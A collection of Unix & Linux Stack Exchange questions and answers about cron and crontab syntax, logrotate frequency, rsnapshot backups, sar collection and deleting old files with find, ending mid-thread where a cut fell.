In typical setups, logrotate has a default setting to rotate logs weekly. If you want to change that, changing /etc/cron.daily/logrotate won’t help; even if you made logrotate run every minute, it still would only rotate logs weekly. To change the frequency at which logs are rotated, you need to change the rotation configuration itself, either globally, or for each log file you want to rotate daily.
So the answer to your question is, to rotate log files daily, specify the daily directive in the relevant section of the rotation configuration.
| What should be the preferred approach while rotating logs - using the daily directive or putting the file path in cron.daily? [closed] |
1,400,072,087,000 |
To begin, here is an example of a filename for a daily backup file:
website-db-backup06-June-2020.tar.gz
The script below works fine when run manually via the terminal. However, I am getting this cron daemon message on my email when the script is run via cron:
tar: website-db-backup*: Cannot stat: No such file or directory
tar: Exiting with failure status due to previous errors
Here is a script I made to compress all daily backups every week:
#!/bin/bash
#
# Weekly compression for database backups
BACKUP_PATH=~/backup/web/database
BACKUP_FILE_DATE=`date '+%d-%B-%Y'`
tar -czf $BACKUP_PATH/website-db-weekly-compress$BACKUP_FILE_DATE.tar.gz \
-C $BACKUP_PATH/ website-db-backup* && rm $BACKUP_PATH/website-db-backup*
Since the daily backup has date on the filename, I have to use * on the script. Can this be the reason?
|
The problem is the current working directory of the script. website-db-backup* does not have a path so it is executed in the current directory. You must add something like this to your script:
SOURCE_DIR_PATH='/path/to/backup_source'
cd "$SOURCE_DIR_PATH" || exit 1
In addition you should check whether there are any matching files at all before you exeute tar:
shopt -s nullglob
set -- website-db-backup*
test $# -eq 0 && { echo 'ERROR: No matching files; aborting'; exit 1; }
It may not be a problem in this case but as danielleontiev points out in the comment it is dangerous to use ~ in a script if this script may be executed by different users. I suggest you replace it with the intended path.
| Script not working as expected when run as a cronjob |
1,400,072,087,000 |
From https://unix.stackexchange.com/a/489913/674
Logging in is a user-space construct; the kernel doesn’t care about that.
There are multiple examples of this; for example, cron jobs can run as any user, without that user being logged in. ... connecting using SSH counts as logging in.
Since there are examples which have and which don't have logging in, may I ask what logging in is? What activities counts as logging in and what not?
Let me guess. Is any activity involving asking for user name and its password, and checking that information in /etc/passwd and /etc/shadow counted as logging in? Otherwise, not logging in?
Is running su logging in?
Is running sudo logging in? Or not, because it doesn't ask for the target user's password?
What are some other educational examples?
Thanks.
|
At the most basic level, it can be considered "authenticating to a service to obtain resources from that service".
But, in Unix, the term isn't so strictly defined. Different services can interpret in different ways.
Where terminology gets confused is when you think of "logging into Unix" and getting a "login session", rather than "accessing a service".
So, for example, ssh remotemachine is considered logging in, but ssh remotemachine cat /etc/passwd may not be (sshd will perform different actions, log different data, update different files); they're both authenticating to a service and getting resources... but the second version is not considered a "login session".
Also note that authentication need not be using the passwd and shadow files (e.g. an FTP server could use a different authentication database, or SSH public keys may be used, or a kerberos ticket, or...).
| What is logging in? |
1,400,072,087,000 |
Today, when I logged in and checked the ps output, I noticed
a few lines that were run automatically under the root.
I grepped the relevant lines here:
root 1126 0.0 0.0 2616 424 ? Ss Apr16 0:06 cron
root 6445 0.0 0.0 2400 868 ? Ss 07:30 0:00 anacron -s
root 6566 0.0 0.0 2244 276 ? S 07:35 0:00 /bin/sh -c nice run-parts --report /etc/cron.daily
root 6567 0.0 0.0 2152 524 ? SN 07:35 0:00 run-parts --report /etc/cron.daily
root 6574 0.0 0.0 2244 556 ? SN 07:35 0:00 /bin/sh /etc/cron.daily/apt
root 6615 0.0 0.0 2160 272 ? SN 07:35 0:00 sleep 1721
I haven't been using cron on this machine for a long time (years), so don't remember I started it on the 16th April. What is the meaning of those commands in sequence? Could it be a security issue?
|
You may not personally be using cron, but the system uses it for essential maintenance tasks, such as rotating log files that have grown too big or too old, checking disk quotas, doing consistency checks, making sure permissions on essential files are correct, or mailing the root user differences between important configuration files that have changed since last run (this differs a lot between systems).
Never try to disable cron. It will prevent essential tasks from running on your system.
If you look in /etc/cron.daily you will find all the system maintenance tasks that are run on a daily basis. On some systems there is also a corresponding weekly and/or monthly lists of tasks.
anacron is a program that is often used on machines that aren't up and running all the time. It is likely that your system uses it to schedule the daily tasks (possibly via cron). It makes sure that daily tasks are run at least once daily (whereas cron requires the machine to be up and running at specific times to run tasks).
run-parts is a Linux thing that runs multiple scripts in a directory in sequence (e.g. all scripts in /etc/cron.daily).
/etc/cron.daily/apt is the currently running maintenance task, obviously having something to do with your package manager apt (possibly doing some update of either packages or of the list of available security updates or something similar).
The sleep may be a delay before the next task is run, if it is related at all.
In short: nothing to worry about, but do have a look at those things in /etc/cron.daily just to inform yourself about how your system works.
| What does "/bin/sh -c nice run-parts --report /etc/cron.daily" mean? |
1,400,072,087,000 |
I have a shell script that writes the date to a log file when executed. When I run the script manually, the correct output gets written to the file. However, this needs to be automated, and when I run as a cron job, nothing is getting written to the file and I am confused why.
crontab:
0 * * * * tomcat /usr/bin/sh /apps/rdsreplication/snap_replication.sh
Sample Code:
#/bin/bash/
echo ---------------------------------------- >> create_snap.txt
echo Start time: >> create_snap.txt
date >> create_snap.txt
Any help would be appreciated!
|
The shell script needs to use the full path for the log file:
#/bin/bash/
# assuming you want the txt file in the same directory as the bash script
logfile="$(dirname "$0")/create_snap.txt"
{
echo ----------------------------------------
echo Start time:
date
} >> "$logfile"
| Cron job isn't writing to log file |
1,400,072,087,000 |
I am trying to add a cron job to perform an rsync from a remote server to a (Ubuntu12) local machine & create a log file.
Below is the crontab-l
00 18 * * * rsync -a -v --delete -e ssh user@centosvm:/home/user/rsync-test ~/backup > ~/rsync$(date +%Y%m%d_%H%M%S).log 2>&1
i kept getting this mail informing about the syntax error in the job.
Received: by work-virtual-machine (Postfix, from userid 1002)
id 697ADA24A0; Thu, 30 Apr 2015 16:21:01 -0700 (PDT)
From: root@work-virtual-machine (Cron Daemon)
To: user@work-virtual-machine
Subject: Cron <user@work-virtual-machine> "rsync -a -v --delete -e ssh user@centosvm:/home/user/rsync-test ~/backup > /home/user/rsync$(date +
Content-Type: text/plain; charset=ANSI_X3.4-1968
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/home/user>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=user>
Message-Id: <20150430232101.697ADA24A0@work-virtual-machine>
Date: Thu, 30 Apr 2015 16:21:01 -0700 (PDT)
/bin/sh: 1: Syntax error: end of file unexpected (expecting ")")
i have also installed unix2dos package.
|
okay - figured it out. Posting back just incase if someone runs into it someday at sometime. The % sign has a special meaning in crontab. it's changed to newline and any string after the first % will be sent to the command as standard input. To force cron to interpret it literally, you have to escape it:
00 18 * * * rsync -a -v --delete -e ssh user@centosvm:/home/user/rsync-test ~/backup > ~/rsync$(date +\%Y\%m\%d_\%H\%M\%S).log 2>&1
| Usage of '%' in the crontab [duplicate] |
1,400,072,087,000 |
I read somewhere that you can add a cron job to run every minute like this:
#min hour day month weekday command
*/1 * * * * <your command>
What does the /1 part mean? Can I omit it?
|
That is the step value. so */2 means every other hour, */3 every third hour, etc. The default step is 1, so you can omit /1 if you want a step value of 1.
see the crontab(5) man page for more detail. man 5 crontab
| Run a cron job every minute, meaning of syntax [duplicate] |
1,400,072,087,000 |
I scheduled a job like this:
* * 6-8 * 1-5 echo "test" >>/tmp/test.log 2>&1
I expect this job to run only on 6th,7th,8th, these 3 days. but today is 18th, it still runs. What is wrong with this job? What shall I do if I want it to run a some specific days?
|
The day-of-month and day-of-week positions are OR'd, so in your example, the cron will run on the 6th, 7th, or 8th or Monday through Friday. Since the 18th is a Monday, it runs. It's not exactly intuitive.
To get the behavior I think you desire (run on the 6th, 7th, and 8th if they are a weekday), then you can do something like this:
* * * * 1-5 date '+%d' | grep '[678]' && echo "test" >>/tmp/test.log 2>&1
| Third cron field doesn't seem to work (job runs when I don't want it to) |
1,400,072,087,000 |
Every week there's a new work log/to-do list at work. There's a todo script which can be used to extract my own to-do items from that. Currently this is called in ~/.bash_aliases_local, which is sourced from ~/.bash_aliases. Rather than parsing the log every time I start another shell, I'd like to use the standard MOTD (message of the day) functionality. This would involve updating a static file with the to-do list on a weekly basis:
@weekly update-motd
The resulting static text file should be printed every time I start an interactive Bash shell. What's the standard way to do this?
|
If you want to have the message displayed every time you open up a new terminal (under an X session), then motd is not the right place. It is executed by the login program - this happens when you log in on a real tty (or via ssh for example).
For terminal sessions, I believe the only universal way is to run cat somefile at the end of your shell's startup file: either personal (i.e. ~/.bashrc ~/.zshrc etc.) or global (under /etc - see your shell's manpage for details). Generally, I'm afraid there isn't a "standard" way of doing this in case of terminal emulator sessions.
| How to update MOTD regularly? |
1,400,072,087,000 |
This might seem like just another basic cron question, but I cannot figure this one out:
@hourly "/usr/bin/php /usr/local/bin/notify.sh"
I migrated a bunch of stuff from one server to another and was able to get most things operating smoothly after some work, and now I'm putting out the fires.
I'm getting this email every hour, when the following cron job is supposed to run:
/bin/sh: 1: /usr/bin/php /usr/local/bin/notify.sh: not found
Typically, not found is caused by PATH not being there (an issue with cron jobs), but I am providing the full path for both PHP and the script. The script runs as root, and interactively, I can run the script.
The script has 755 permissions, just to be safe (anyone can read or execute), so the permissions are not the issue.
I can manually run the script and the script that it calls so I have no idea where this "Not found" is coming from.
Nothing suspicious in the cron log, other than this ran.
This worked properly on the old server.
Is there some other factor likely in play here, or how might I try to trace the cause of this issue?
|
The entry
@hourly "/usr/bin/php /usr/local/bin/notify.sh"
passes /usr/bin/php /usr/local/bin/notify.sh to /bin/sh -c as a single argument. That's why the error message is
/bin/sh: 1: /usr/bin/php /usr/local/bin/notify.sh: not found
rather than either of
/bin/sh: 1: /usr/bin/php: not found
Could not open input file: /usr/local/bin/notify.sh
To pass the program /usr/bin/php and its filename argument /usr/local/bin/notify.sh separately, remove the quoting:
@hourly /usr/bin/php /usr/local/bin/notify.sh
| cron: not found when full paths are provided |
1,400,072,087,000 |
As we know that MAILTO is used for receiving any mail related to the Cron job. In my case I have three commands to execute, do I need to add MAILTO three times even if the receiver mail id is the same for each of the three commands? My jobs are running on a CentOS machine.
[email protected]
./first-Command
[email protected]
./second-Command
[email protected]
./third-Command
Or mentioning the mail id only once will work in my situation? like this:
[email protected]
./first-Command
./second-Command
./third-Command
I'm new to the Cron tool. Any idea/hint in the right direction will do!
|
The MAILTO variable, if set, is retrieved from the crontab file, so if it exists and is not "" then it will be used for all subsequent jobs in that file, just like if you had created a shell script like your second example.
Therefore, setting it at the top of the crontab file is enough, just like you could change the crontab shell from sh to bash with SHELL=/bin/bash in the beginning of the file per the man page.
| Do we have to rewrite the MAILTO after each cron command? |
1,400,072,087,000 |
I've been following carefully and reading a lot about setting up crontab with crontab -e any help is appreciated on this ...
I have a process that runs on startup (reboot) that works perfectly, and I want it to continue to run every minute but that does not happen. I do have a new-line (linefeed) at the end of the 2nd line. THANKS!!
I have program /dir/xxx that works great on reboot but the same process set to run every minute never triggers. My crontab -e is as follows:
@reboot /dir/xxx
/1 * * * * /dir/xxx
I do have a newline after the second line.
|
I wonder how your crontab accepted this. What you mean by /1 in fact should be */1. Try it out.
And if it's all in one line, like:
@reboot /dir/xxx /1 * * * * /dir/xxx
Then there should be a new line between both (and */1) instead of /1:
@reboot /dir/xxx
*/1 * * * * /dir/xxx
In the one line version /1 * * * * /dir/xxx would be treated and passed as arguments to /dir/xxx. With * undergoing path expansion.
| Why does my every-minute crontab not work but same process on @reboot works fine? |
1,400,072,087,000 |
I have script files.
.file I need to run only on the first day of the every month.
How can I do this with my cron job?
52 07 * * * bash '/home/linux/tanu/cat.sh'
|
# * * * * *
# | | | | |
# | | | | day of week 0-7 (0 or 7 is Sun, or use names)
# | | | month 1-12 (or names)
# | | day of month 1-31
# | hour 0-23
# minute 0-59
# runs on every 1st of month at 7:52am
52 7 1 * * bash '/home/linux/tanu/cat.sh'
# runs on all other days at 7:52am
52 7 2-31 * * bash '/home/linux/tanu/cat.sh'
I hope that's correct.
| How to schedule cron jobs in linux? |
1,400,072,087,000 |
I have some logic for executing java projects; it all works in the terminal console when I type it, but not in the cron scheduler:
run 1st microservice and get variable from POST request:
java -jar /root/parser-0.0.1-SNAPSHOT.jar
value=$(curl -d '{"query":"java-middle", "turnOff":true}' -H "Content-Type: application/json" -X POST http://localhost:8080/explorer)
v2=$(echo ${value} | jq '.id')
test:
echo $v2
18
18 - id from database, and I use it in next request: (first run new microservice)
java -jar parsdescription-0.0.1-SNAPSHOT.jar
value=$(curl -d '{"explorerId":'$v2', "turnOff":true}' -H "Content-Type: application/json" -X POST http://localhost:8080/descriptions) >> /var/log/description3.log 2>&1
So, curl executed normal, database did fill some data and in value I get correct value.
But, when I create a crontab schedule:
50 09 * * * java -jar /root/parser-0.0.1-SNAPSHOT.jar
51 09 * * * value=$(curl -d '{"query":"java-middle", "turnOff":true}' -H "Content-Type: application/json" -X POST http://localhost:8080/explorer)
52 09 * * * v2=$(echo ${value} | jq '.id')
53 09 * * * java -jar parsdescription-0.0.1-SNAPSHOT.jar
54 09 * * * value=$(curl -d '{"explorerId":'$v2', "turnOff":true}' -H "Content-Type: application/json" -X POST http://localhost:8080/descriptions) >> /var/log/description3.log 2>&1
Then execute normally only first curl (in database created new note).
In next - executed second microservice ( 53 09 * * * java -jar parsdescription-0.0.1-SNAPSHOT.jar ), but nothing not execute in second curl command, and nothing save in description3.log file - he is a empty.
Why that worked in console, but not working in crontab?
|
Each cron job is a unique shell instance that does not share state with any other cron job, so
51 09 * * * value=42
sets value only for that job, which then exits, and value is then lost. A shell session, by contrast, maintains state over successive lines. You will need a single cron job that runs all that code, or some other design; a single cron job might look like
51 09 * * * /path/to/your/script
and then the file /path/to/your/script should be executable and contain
#!/bin/bash
java -jar /root/parser-0.0.1-SNAPSHOT.jar
value=$(curl -d '{"query":"java-middle", ...
and so forth.
If you need to share data between different cron jobs that information would need to be shared via some IPC (interprocess communication) method (the filesystem, a database, etc).
| cron not executing command with variable |
1,400,072,087,000 |
We want to execute the following line each time at 00:00 night
Dose this line is valid in crontab or cron job inspite commands with several lines ?
0 0 * * * find . -type f \( -name '*.wsp' -printf WSP -o -printf OTHER \) -printf ' %T@ %b :%p\0' | sort -zk 1,1 -k2,2rn | gawk -v RS='\0' -v ORS='\0' '
{du += 512 * $3}
du > 10 * (2^30) && $1 == "WSP" {
sub("[^:]*:", ""); print
}' | xargs -r0 rm -f
|
No, your example will not work. You have to write the whole command on a single line. Consider writing a script and just calling the script from cron.
For example:
$ cat mycron.bash
#!/bin/bash
find . -type f \( -name '*.wsp' -printf WSP -o -printf OTHER \) \
-printf ' %T@ %b :%p\0' | \
sort -zk 1,1 -k2,2rn | \
gawk -v RS='\0' -v ORS='\0' '
{du += 512 * $3}
du > 10 * (2^30) && $1 == "WSP" {
sub("[^:]*:", ""); print
}' | xargs -r0 rm -f
Then your crontab entry would be something like this:
0 0 * * * mycron.bash
| Does crontab accept commands with several lines as shell expected? |
1,400,072,087,000 |
The output of crontab -l and crontab are different.
root@ce:~# crontab -l
0-59 * * * * curl http://ce.scu.ac.ir/courses/admin/cron.php?password=mypass
* * * * * ntpdate –s ir.pool.ntp.org
* * * * * php /var/www/html/shub/ow_cron/run.php
root@ce:~# cat /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/01 * * * * www-data /var/www/html/shub/ow_cron/run.php
*/1 * * * * www-data /usr/bin/php7.0 /var/www/html/courses/admin/cli/cron.php > /var/log/moodle/cron.log
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
I ask that because some documents say to use crontab -e to define cron jobs. Should I use crontab -e or vim /etc/crontab?
|
crontab -l shows the running user's crontab, the one stored in /var/spool/cron/crontabs. Anything defined there runs under the user id of that user. This isn't particular to root, but root can also have one.
/etc/crontab, on the other hand, contains the system-wide main crontab (along with /etc/cron.d). The entries in that file have an additional field for the username, the jobs defined there run under that user id.
You can use either one, or create a file or files to define your cronjobs under /etc/cron.d.
| Defining scheduled jobs with cron, 'crontab -e' vs '/etc/crontab' |
1,400,072,087,000 |
In crontab I can set this syntax 5 4 * * 3-5
Which translates to every Wednesday, Thursday and Friday at 4:05, which works well, but when using 5-3 which (expected) translates to Friday, Saturday...Wednesday, it says wrong syntax, I noticed it should be in order, but what if I need it the other way?
I use this to test cron syntax.
|
one way is
5 4 * * 0-3,5-7 script
0 and 7 are sunday
another way
5 4 * * 0,1,2,3,5,6 script
| Cron arbtirary weekdays range |
1,400,072,087,000 |
CRONTABS
I'm using rsnapshot with cron. Here's what sudo crontab -l shows me.
0 */4 * * * /usr/bin/rsnapshot hourly
30 3 * * * /usr/bin/rsnapshot daily
0 3 * * 1 /usr/bin/rsnapshot weekly
OUTPUT
I went to check on the backup folder to see if everything is working correctly, but here is the time sorted output:
elijah@degas:~$ ls -lt /media/backup/
total 0
drwxrwxrwx 1 root root 0 May 30 04:00 hourly.1
drwxrwxrwx 1 root root 0 May 23 04:00 hourly.2
drwxrwxrwx 1 root root 0 May 17 04:00 hourly.3
drwxrwxrwx 1 root root 0 May 14 04:00 hourly.4
drwxrwxrwx 1 root root 0 May 13 04:00 hourly.5
drwxrwxrwx 1 root root 0 May 12 04:00 daily.0
drwxrwxrwx 1 root root 0 May 10 04:00 daily.1
drwxrwxrwx 1 root root 0 May 7 04:00 daily.2
drwxrwxrwx 1 root root 0 May 4 04:00 daily.3
drwxrwxrwx 1 root root 0 Apr 29 16:00 daily.4
drwxrwxrwx 1 root root 0 Apr 28 20:00 daily.5
drwxrwxrwx 1 root root 0 Apr 28 16:04 hourly.0
drwxrwxrwx 1 root root 0 Apr 28 12:21 daily.6
drwxrwxrwx 1 root root 0 Apr 27 10:09 weekly.1
drwxrwxrwx 1 root root 0 Apr 25 07:23 weekly.3
The output seems almost random! Why could this be happening? I have what I thought was an identical configuration on a different machine, and it seems to be working fine.
SYSLOG
elijah@degas:~$ cat /var/log/syslog.1 | grep cron
Jun 20 07:40:21 degas anacron[2795]: Job `cron.daily' terminated
Jun 20 07:40:21 degas anacron[2795]: Normal exit (1 job run)
Jun 20 08:17:01 degas CRON[3144]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 09:17:01 degas CRON[3228]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 10:17:01 degas CRON[4893]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 11:17:01 degas CRON[8737]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 12:17:01 degas CRON[10192]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 13:17:01 degas CRON[11870]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 14:17:01 degas CRON[12829]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 15:17:01 degas CRON[13614]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 15:54:28 degas crontab[14446]: (root) BEGIN EDIT (root)
Jun 20 15:55:27 degas crontab[14446]: (root) END EDIT (root)
Jun 20 15:55:29 degas crontab[14460]: (root) LIST (root)
Jun 20 16:17:01 degas CRON[14770]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 16:44:04 degas crontab[14911]: (root) DELETE (root)
Jun 20 16:44:07 degas crontab[14913]: (root) LIST (root)
Jun 20 17:17:01 degas CRON[15713]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 18:17:01 degas CRON[15842]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 19:17:01 degas CRON[15928]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 20:17:01 degas CRON[16023]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 21:17:01 degas CRON[16110]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 22:17:01 degas CRON[16212]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 20 23:17:01 degas CRON[16300]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 00:00:01 degas CRON[16372]: (root) CMD (invoke-rc.d atop _cron)
Jun 21 00:17:01 degas CRON[16437]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 01:17:01 degas CRON[16525]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 02:17:01 degas CRON[16612]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 03:17:01 degas CRON[16701]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 04:17:01 degas CRON[16798]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 05:17:01 degas CRON[16886]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 06:17:01 degas CRON[16974]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 06:25:01 degas CRON[16988]: (root) CMD (test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ))
Jun 21 07:17:01 degas CRON[17061]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Jun 21 07:30:01 degas CRON[17083]: (root) CMD (start -q anacron || :)
Jun 21 07:30:01 degas anacron[17086]: Anacron 2.3 started on 2016-06-21
Jun 21 07:30:01 degas anacron[17086]: Will run job `cron.daily' in 5 min.
Jun 21 07:30:01 degas anacron[17086]: Jobs will be executed sequentially
Jun 21 07:35:01 degas anacron[17086]: Job `cron.daily' started
Jun 21 07:35:01 degas anacron[17099]: Updated timestamp for job `cron.daily' to 2016-06-21
RSNAPSHOT TEST
elijah@degas:~$ /usr/bin/rsnapshot -t hourly
echo 23633 > /var/run/rsnapshot.pid
/bin/rm -rf /media/backup/hourly.5/
mv /media/backup/hourly.4/ /media/backup/hourly.5/
mv /media/backup/hourly.3/ /media/backup/hourly.4/
mv /media/backup/hourly.2/ /media/backup/hourly.3/
mv /media/backup/hourly.1/ /media/backup/hourly.2/
/bin/cp -al /media/backup/hourly.0 /media/backup/hourly.1
/usr/bin/rsync -a --delete --numeric-ids --relative --delete-excluded \
--exclude=/var/ --exclude=/space/ --exclude=/nfs/ --exclude=/media/ \
--exclude=/proc/ --exclude=/sys/ --exclude=/dev/ --exclude=/tmp/ \
--exclude=/cdrom/ --exclude=media/backup /. \
/media/backup/hourly.0/Backup
touch /media/backup/hourly.0/
|
After some extended discussion it appears that the filesystem may corrupted. As an example, rm -rf fails - as root - on a normal tree of files.
After unmounting the filesystem, fsck identified it as NTFS.
Frustratingly I have seen NTFS fail on other Linux-based platforms under the heavy loads incurred from rsnapshot. There's nothing sufficiently repeatable with which a bug can be filed, but a week's worth of rsnapshots can usually corrupt the filesystem.
My recommendation is to replace the NTFS filesystem with something native to a Linux-based system, such as ext4. As an aside, if the backups must be accessed from a Windows platform, I have had good use from the Ext2FSD utility and driver for extN filesystems (also at sourceforge).
| What the heck is going on with my cron scheduler? (rsnapshot) |
1,459,409,985,000 |
On a Debian server, I have a crontab entry that should call a script every day at 04:21 AM.
That's what it did, until today .. but now the script is called every 15 minutes without any reason !
I have not changed the crontab in months !
Here's the crontab line :
21 4 * * * /usr/bin/wget -O /dev/null http://www.domain.tld/tasks/hebdomadaire.php &> /dev/null
And here's the Apache log ( cat access.log | grep "hebdomadaire" ) :
SERVER_IP - - [28/Mar/2016:04:21:01 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [29/Mar/2016:04:21:01 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [30/Mar/2016:04:21:01 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:04:21:01 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:04:36:02 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:04:51:04 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:05:06:07 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:05:21:11 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:05:36:16 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:05:51:22 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:06:06:30 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:06:21:38 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:06:36:47 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:06:51:57 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
SERVER_IP - - [31/Mar/2016:07:07:07 +0000] "GET /tasks/hebdomadaire.php HTTP/1.1" 200 454 "-" "Wget/1.13.4 (linux-gnu)"
How can that be?
|
The default behaviour of wget (documented in the manual) is to restart after a default timeout of 900s (aka 15 min).
Adding --timeout=0 solves the problem here.
| Cron suddenly calls a script every 15 minutes |
1,459,409,985,000 |
I Want to run Cronjob; after every three hours from last run time for indefinite period and can check whether it ran or not
Could anyone help me in getting what values to be give in this format:
crontab -e
Tried following:
0 0/3 * * * /home/wlogic/SHScripts/DiskCheck/DiskSpaceCheck.sh
When I save file using :wq
I get the message:
crontab: installing new crontab
"/tmp/crontab.vErqAL":1: bad hour
errors in crontab file, can't install.
Do you want to retry the same edit?
|
You should be able to use the following line to run a job every 3 hours:
0 */3 * * * /home/wlogic/SHScripts/DiskCheck/DiskSpaceCheck.sh
To check whether your cron job ran, check your syslog or cron log. This can be different between distributions, for example:
Ubuntu: /var/log/syslog
Dec 1 11:17:01 testhost CRON[6746]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
CentOS: /var/log/cron
Dec 1 11:01:01 testhost run-parts(/etc/cron.hourly)[13259]: starting 0yum-hourly.cron
Dec 1 11:03:50 server run-parts(/etc/cron.hourly)[13302]: finished 0yum-hourly.cron
Solaris: /var/cron/log
> CMD: /usr/lib/sa/sa1
> sys 12394 c Tue Dec 1 11:20:00 2015
< sys 12394 c Tue Dec 1 11:20:00 2015
If you want to log all output of the scheduled command itself you can use the following:
0 */3 * * * /home/wlogic/SHScripts/DiskCheck/DiskSpaceCheck.sh > /path/to/job-log 2>&1
The above will redirect the output (if any) to the logfile /path/to/job-log and will also redirect the output of STDERR to this logfile.
| How to set Cron job that run after every three hours for indefinite period; with Logging? |
1,459,409,985,000 |
I have a Linux host which I would like to have a cron job run on. I do not shut down this machine. I always suspend it. I want to run a job once a day and I cannot set it for a particular time since my machine may or may not be running. I would like a cron job the first time a day when my machine comes live and not anymore throughout the day. Is that possible? Please do let me know, Thanks!
|
This is handled by anacron, which runs the default cron.daily etc. jobs on Fedora.
If this is a root job, you can either add it to the /etc/cron.daily or to /etc/anacrontab.
| Floating time cron job |
1,459,409,985,000 |
I want it to give me all the sar/sadc options, interrupts,disk,etc.. every 10 seconds starting at noon for the entire hour. On the second line I want to capture the info in /proc/interrupts every minute for the hour of noon in a log file. Please verify the syntax.
* 12 * * * root /usr/lib64/sa/sa1 -S XALL 10 360
*/1 12 * * * root cat /proc/interrupts >> /root/proc_int.log && date >> /root/proc_int.log
|
The sa1 command collects and stores binary data in system activity data file. The command is a kind of shell wrapper of sadc command and it accepts all its parameters. So check the sadc man page for details.
The first line above is correct as XALL means to collect all available system activities. The collection will run for 1 hour (10 * 360s = 3600s = 1h) as required. The second line is all right as well.
| Is this sar/sysstat cron job formatted correctly? |
1,459,409,985,000 |
I have a script located /myscript/script.sh and I have a cronjob that I submitted like this:
sudo crontab -e
The contents of the crontab are as follows:
*/1 * * * * ./myscript/script.sh
The script requires root privileges as it deletes directories. Is there anything glaringly wrong with the way I've done this?
|
The biggest problem is that you put . in front of the script name. . is the current directory, which you are blindly assuming you know when you set up the crontab entry. Bottom line, don't use relative paths in cron scripts: give the absolute path to the script.
Also, */1 is pointlessly verbose. It means exactly the same thing as *. Your script runs every minute of every day. (Does it really need to run so often?)
| Cron job doesn't seem to be executing in ubuntu |
1,459,409,985,000 |
I want to run a cron job which deletes .txt files older than 7 days. I have two commands.
The first command:
/usr/bin/find /var/www/example.com/wp-content/targetdir -name "*.txt" -type f -mtime +7 -exec rm -f {} \;
The second command:
/usr/bin/find /var/www/example.com/wp-content/targetdir -name "*.txt" -type f -mtime +7 -delete
Both the commands can be used be delete .txt files older than 7 days. I have read that the first command is associated with a race condition. Can one please elaborate the advantages of using the second command over the first command? What are the pros and cons of using one above the other?
|
The race I saw mentioned is this, from Stéphane Chazelas's comment to another question:
